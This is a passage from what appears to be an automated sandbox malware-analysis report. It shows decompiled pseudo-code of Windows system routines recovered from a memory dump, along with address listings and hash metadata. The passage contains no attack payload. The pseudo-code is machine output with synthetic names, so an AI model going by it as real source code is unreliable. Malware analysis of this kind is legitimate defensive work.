										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M010C45F8))) {
												case 0:
													_v568 = 0x1081078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x10811c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L010C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E010EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E010EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E010A52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E010BEB70(1, 0x11979a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E010BAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E010E95D0();
																			L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E010EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E010E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E010EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                          0x010c4128
                                          0x010c4135
                                          0x010c413c
                                          0x010c4141
                                          0x010c4145
                                          0x010c4147
                                          0x010c414e
                                          0x010c4151
                                          0x010c4159
                                          0x010c415c
                                          0x010c4160
                                          0x010c4164
                                          0x010c4168
                                          0x010c416c
                                          0x010c417f
                                          0x010c4181
                                          0x010c446a
                                          0x010c446a
                                          0x010c418c
                                          0x010c4195
                                          0x010c4199
                                          0x010c4432
                                          0x010c4439
                                          0x010c443d
                                          0x010c4442
                                          0x010c4447
                                          0x00000000
                                          0x010c419f
                                          0x010c41a3
                                          0x010c41b1
                                          0x010c41b9
                                          0x010c41bd
                                          0x010c45db
                                          0x010c45db
                                          0x00000000
                                          0x010c41c3
                                          0x010c41c3
                                          0x010c41ce
                                          0x010c41d4
                                          0x0110e138
                                          0x0110e13e
                                          0x0110e169
                                          0x0110e16d
                                          0x0110e19e
                                          0x0110e16f
                                          0x0110e16f
                                          0x0110e175
                                          0x0110e179
                                          0x0110e18f
                                          0x0110e193
                                          0x00000000
                                          0x0110e199
                                          0x00000000
                                          0x0110e199
                                          0x0110e193
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010c41da
                                          0x010c41da
                                          0x010c41df
                                          0x010c41e4
                                          0x010c41ec
                                          0x010c4203
                                          0x010c4207
                                          0x0110e1fd
                                          0x010c4222
                                          0x010c4226
                                          0x0110e1f3
                                          0x0110e1f3
                                          0x010c422c
                                          0x010c422c
                                          0x010c4233
                                          0x0110e1ed
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010c4239
                                          0x010c4239
                                          0x010c4239
                                          0x010c4239
                                          0x010c4233
                                          0x010c4226
                                          0x010c41ee
                                          0x010c41ee
                                          0x010c41f4
                                          0x010c4575
                                          0x0110e1b1
                                          0x0110e1b1
                                          0x00000000
                                          0x010c457b
                                          0x010c457b
                                          0x010c4582
                                          0x0110e1ab
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010c4588
                                          0x010c4588
                                          0x010c458c
                                          0x0110e1c4
                                          0x0110e1c4
                                          0x00000000
                                          0x010c4592
                                          0x010c4592
                                          0x010c4599
                                          0x0110e1be
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010c459f
                                          0x010c459f
                                          0x010c45a3
                                          0x0110e1d7
                                          0x0110e1e4
                                          0x00000000
                                          0x010c45a9
                                          0x010c45a9
                                          0x010c45b0
                                          0x0110e1d1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010c45b6
                                          0x010c45b6
                                          0x010c45b6
                                          0x00000000
                                          0x010c45b6
                                          0x010c45b0
                                          0x010c45a3
                                          0x010c4599
                                          0x010c458c
                                          0x010c4582
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010c41f4
                                          0x010c423e
                                          0x010c4241
                                          0x010c45c0
                                          0x010c45c4
                                          0x00000000
                                          0x010c45ca
                                          0x010c45ca
                                          0x00000000
                                          0x0110e207
                                          0x0110e20f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010c45d1
                                          0x00000000
                                          0x00000000
                                          0x010c45ca
                                          0x00000000
                                          0x010c4247
                                          0x010c4247
                                          0x010c4247
                                          0x010c4249
                                          0x010c4249
                                          0x010c4249
                                          0x010c4251
                                          0x010c4251
                                          0x010c4257
                                          0x010c425f
                                          0x010c426e
                                          0x010c4270
                                          0x010c427a
                                          0x0110e219
                                          0x0110e219
                                          0x010c4280
                                          0x010c4282
                                          0x010c4456
                                          0x010c45ea
                                          0x00000000
                                          0x010c45f0
                                          0x0110e223
                                          0x00000000
                                          0x0110e223
                                          0x010c445c
                                          0x010c445c
                                          0x00000000
                                          0x010c445c
                                          0x00000000
                                          0x010c4288
                                          0x010c428c
                                          0x0110e298
                                          0x010c4292
                                          0x010c4292
                                          0x010c429e
                                          0x010c42a3
                                          0x010c42a7
                                          0x010c42ac
                                          0x0110e22d
                                          0x010c42b2
                                          0x010c42b2
                                          0x010c42b9
                                          0x010c42bc
                                          0x010c42c2
                                          0x010c42ca
                                          0x010c42cd
                                          0x010c42cd
                                          0x010c42d4
                                          0x010c433f
                                          0x010c433f
                                          0x010c42d6
                                          0x010c42d6
                                          0x010c42d9
                                          0x010c42dd
                                          0x010c42eb
                                          0x0110e23a
                                          0x010c42f1
                                          0x010c4305
                                          0x010c430d
                                          0x010c4315
                                          0x010c4318
                                          0x010c431f
                                          0x010c4322
                                          0x010c432e
                                          0x010c433b
                                          0x010c433b
                                          0x00000000
                                          0x010c432e
                                          0x010c42eb
                                          0x010c434c
                                          0x010c434e
                                          0x010c4352
                                          0x010c4359
                                          0x010c435e
                                          0x010c4361
                                          0x010c436e
                                          0x010c438a
                                          0x010c438e
                                          0x010c4396
                                          0x010c439e
                                          0x010c43a1
                                          0x010c43ad
                                          0x010c43bb
                                          0x010c43bb
                                          0x010c43ad
                                          0x010c436e
                                          0x010c43bf
                                          0x010c43c5
                                          0x010c4463
                                          0x010c4463
                                          0x010c43ce
                                          0x010c43d5
                                          0x010c43d9
                                          0x010c43df
                                          0x010c4475
                                          0x010c4479
                                          0x010c4491
                                          0x010c4491
                                          0x010c4479
                                          0x010c43e5
                                          0x010c43eb
                                          0x010c43f4
                                          0x010c43f6
                                          0x010c43f9
                                          0x010c43fc
                                          0x010c43ff
                                          0x010c44e8
                                          0x010c44ed
                                          0x010c44f3
                                          0x0110e247
                                          0x00000000
                                          0x010c44f9
                                          0x010c4504
                                          0x010c4508
                                          0x010c450f
                                          0x0110e269
                                          0x00000000
                                          0x010c4515
                                          0x010c4519
                                          0x010c4531
                                          0x010c4534
                                          0x010c4537
                                          0x010c453e
                                          0x010c4541
                                          0x010c454a
                                          0x0110e255
                                          0x0110e255
                                          0x0110e25b
                                          0x0110e25e
                                          0x0110e261
                                          0x0110e261
                                          0x010c4555
                                          0x010c4559
                                          0x010c455d
                                          0x0110e26d
                                          0x0110e270
                                          0x0110e274
                                          0x0110e27a
                                          0x0110e27d
                                          0x0110e28e
                                          0x0110e28e
                                          0x010c4563
                                          0x010c4563
                                          0x010c4569
                                          0x010c4569
                                          0x00000000
                                          0x010c455d
                                          0x010c450f
                                          0x00000000
                                          0x010c44f3
                                          0x010c43ff
                                          0x010c4405
                                          0x010c4405
                                          0x010c4405
                                          0x010c42ac
                                          0x010c428c
                                          0x010c4282
                                          0x010c4407
                                          0x010c440d
                                          0x0110e2af
                                          0x0110e2af
                                          0x010c4413
                                          0x010c4413
                                          0x00000000
                                          0x010c41d4
                                          0x00000000
                                          0x010c41c3
                                          0x010c41bd
                                          0x010c4415
                                          0x010c4415
                                          0x010c4416
                                          0x010c4417
                                          0x010c4429
                                          0x010c416e
                                          0x010c416e
                                          0x010c4175
                                          0x010c4498
                                          0x010c449f
                                          0x0110e12d
                                          0x00000000
                                          0x0110e133
                                          0x00000000
                                          0x0110e133
                                          0x010c44a5
                                          0x010c44a5
                                          0x010c44aa
                                          0x00000000
                                          0x010c44bb
                                          0x010c44ca
                                          0x010c44d6
                                          0x010c44d7
                                          0x010c44d8
                                          0x010c44e3
                                          0x010c44e3
                                          0x010c44aa
                                          0x010c417b
                                          0x010c417b
                                          0x010c417b
                                          0x00000000
                                          0x010c417b
                                          0x010c4175
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48e8c6c71e79acc16c53c443c4cc7c38bba92d29f004bab11d86ba29307cbfd4
                                          • Instruction ID: 1bd169b12db0dc1a4c65cdb429fc615c598e5830444a32cffb56bc9bf2ccf546
                                          • Opcode Fuzzy Hash: 48e8c6c71e79acc16c53c443c4cc7c38bba92d29f004bab11d86ba29307cbfd4
                                          • Instruction Fuzzy Hash: D1F16C70A082118FD729CF19C490A7EBBE1BF98A14F54896EF9C6C7291E774D881CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D20A0 Relevance: .4, Instructions: 420COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E010D20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1198714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E010D2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E010D2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E010A58EC(_t240);
									_t221 =  *0x1195cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1195cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E010E4A2C(0x1196e40, 0x10e4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E010C7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1085c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E010DF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E010DF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01127016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L010C2400(_t267 + 0x20);
															}
															L010C2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E010D2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E010C2280(_t134, 0x1198608);
									__eflags =  *0x1196e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E010BFFB0(_t198, _t241, 0x1198608);
										__eflags = _t253;
										if(_t253 != 0) {
											L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1196e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1198608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E010D6B90(_t210,  &_v64);
										_t262 =  *0x1198608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E010DE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E010E97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E010E006A(0x1198608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1198608);
												E010EB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1196904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1196e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E010BFFB0(_t198, _t240, 0x1198608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E010E00C2(0x1198608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                          0x010d20a0
                                          0x010d20a8
                                          0x010d20ad
                                          0x010d20b3
                                          0x010d20b8
                                          0x010d20c2
                                          0x010d20c7
                                          0x010d20cb
                                          0x010d20d2
                                          0x010d2263
                                          0x010d2266
                                          0x01115836
                                          0x01115836
                                          0x00000000
                                          0x010d226c
                                          0x010d226c
                                          0x010d2270
                                          0x010d2274
                                          0x010d20e2
                                          0x010d20e2
                                          0x010d20e6
                                          0x010d20ee
                                          0x011157dc
                                          0x011157de
                                          0x011157ec
                                          0x011157ec
                                          0x011157f1
                                          0x011157f3
                                          0x011157f8
                                          0x00000000
                                          0x011157f8
                                          0x011157e0
                                          0x011157e4
                                          0x011157ea
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011157ea
                                          0x010d20f4
                                          0x010d20f4
                                          0x010d20f8
                                          0x010d20f8
                                          0x010d20fc
                                          0x010d2100
                                          0x010d2106
                                          0x010d2201
                                          0x010d2206
                                          0x010d220b
                                          0x010d220e
                                          0x010d22a9
                                          0x010d22ac
                                          0x00000000
                                          0x00000000
                                          0x010d22b2
                                          0x010d22b5
                                          0x01115801
                                          0x01115806
                                          0x00000000
                                          0x00000000
                                          0x01115810
                                          0x01115815
                                          0x01115818
                                          0x00000000
                                          0x00000000
                                          0x0111581e
                                          0x010d22bb
                                          0x010d22bb
                                          0x010d2218
                                          0x010d2218
                                          0x010d221c
                                          0x010d2220
                                          0x010d2222
                                          0x010d22c2
                                          0x010d22c4
                                          0x010d22dc
                                          0x010d22dc
                                          0x010d22e1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010d22e7
                                          0x010d22c8
                                          0x010d22cd
                                          0x010d22d3
                                          0x010d22d6
                                          0x01115823
                                          0x01115825
                                          0x01115827
                                          0x00000000
                                          0x00000000
                                          0x0111582d
                                          0x00000000
                                          0x0111582d
                                          0x00000000
                                          0x010d2228
                                          0x010d2228
                                          0x00000000
                                          0x010d2228
                                          0x010d2222
                                          0x010d2214
                                          0x010d2214
                                          0x00000000
                                          0x010d2114
                                          0x010d2114
                                          0x010d2114
                                          0x010d211a
                                          0x010d211c
                                          0x010d2348
                                          0x010d234d
                                          0x01115840
                                          0x01115845
                                          0x01115848
                                          0x0111584e
                                          0x0111584e
                                          0x01115848
                                          0x010d2353
                                          0x010d2355
                                          0x010d2388
                                          0x010d2388
                                          0x010d2368
                                          0x010d236a
                                          0x010d236c
                                          0x010d238f
                                          0x00000000
                                          0x010d236e
                                          0x010d236e
                                          0x010d218e
                                          0x010d218e
                                          0x010d2191
                                          0x010d2195
                                          0x01115a03
                                          0x01115a06
                                          0x01115a0c
                                          0x01115a0f
                                          0x01115a11
                                          0x01115a13
                                          0x01115a13
                                          0x01115a19
                                          0x01115a1f
                                          0x00000000
                                          0x010d219b
                                          0x010d219b
                                          0x010d21a0
                                          0x010d2282
                                          0x010d2284
                                          0x010d2284
                                          0x010d2284
                                          0x010d2284
                                          0x010d21a6
                                          0x010d21a9
                                          0x010d21ac
                                          0x010d21ae
                                          0x010d21b3
                                          0x010d228b
                                          0x010d2290
                                          0x010d2379
                                          0x010d2296
                                          0x010d2298
                                          0x010d2298
                                          0x010d2290
                                          0x010d21b9
                                          0x010d21be
                                          0x010d22a2
                                          0x010d22a2
                                          0x010d21c4
